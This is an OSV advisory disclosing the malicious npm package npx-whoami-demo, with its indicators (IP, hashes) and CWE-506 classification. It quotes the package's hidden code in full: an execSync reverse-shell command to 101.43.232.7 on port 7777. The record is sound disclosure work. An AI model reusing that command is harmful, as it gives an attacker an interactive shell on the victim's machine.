MAL-2026-5772

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/npx-whoami-demo/MAL-2026-5772.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5772
Published
2026-06-14T13:39:01Z
Modified
2026-06-14T15:01:39.476294438Z
Summary
Malicious code in npx-whoami-demo (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (0971bcb88de070f17d932feff04cd6e66ecc825f606b412414457a3afb4ad174)

The package's only code file (index.js, also registered as the package's bin entry) unconditionally executes require('child_process').execSync("bash -c \"bash -i >& /dev/tcp/101.43.232.7/7777 0>&1\"", { stdio: 'inherit' }). This opens an interactive reverse shell from the user's machine to the hardcoded remote host 101.43.232.7 on TCP port 7777, giving the operator of that endpoint a full interactive shell with the privileges of the invoking user. The package advertises itself as a thin wrapper that runs whoami, but no whoami invocation exists in the code — the stated purpose is a cover story for the backdoor. The reverse shell fires whenever the bin is invoked, including via npx npx-whoami-demo, which is the documented usage pattern.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.0.0"
            ],
            "id": "IN-MAL-2026-006472",
            "import_time": "2026-06-14T14:50:19.607058521Z",
            "modified_time": "2026-06-14T13:39:01Z",
            "sha256": "0971bcb88de070f17d932feff04cd6e66ecc825f606b412414457a3afb4ad174",
            "source": "amazon-inspector"
        },
        {
            "sha256": "fd8ebad9242ca5fc2abd9e3951a31bb3f4574f6ca07894be2b12468ccd2e5279",
            "id": "IN-MAL-2026-006473",
            "modified_time": "2026-06-14T13:39:02Z",
            "versions": [
                "1.0.0"
            ],
            "import_time": "2026-06-14T14:50:19.680559676Z",
            "source": "amazon-inspector"
        }
    ]
}
References
Credits

Affected packages

npm / npx-whoami-demo

Package

Affected ranges

Affected versions

1.*
1.0.0

Database specific

indicators
{
    "ips": [
        "101.43.232.7"
    ],
    "package_integrity": [
        {
            "filename": "npx-whoami-demo-1.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-1flIEslRCRkGaOv5JKSWC58w2fuwa9Ii6Bw5b2MmVWZ4+7Y8TIO/abQDLA6I/EavtgpHlPdubX0vgL8BY3NtJQ==",
                "sha1": "a8644fc227b9163630be5e862a3de08eaa2550f6"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "e086d4eb615db23b2fc9dc9a01b6814bbd54c07e0e4e65b2cf8a9440adab5d3c",
            "tlsh": "d3c02b50099c12f8fc00dcb87799c4235557387492706830ccce486305ce3e0023c076",
            "path": "index.js"
        }
    ]
}
cwes
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/npx-whoami-demo/MAL-2026-5772.json"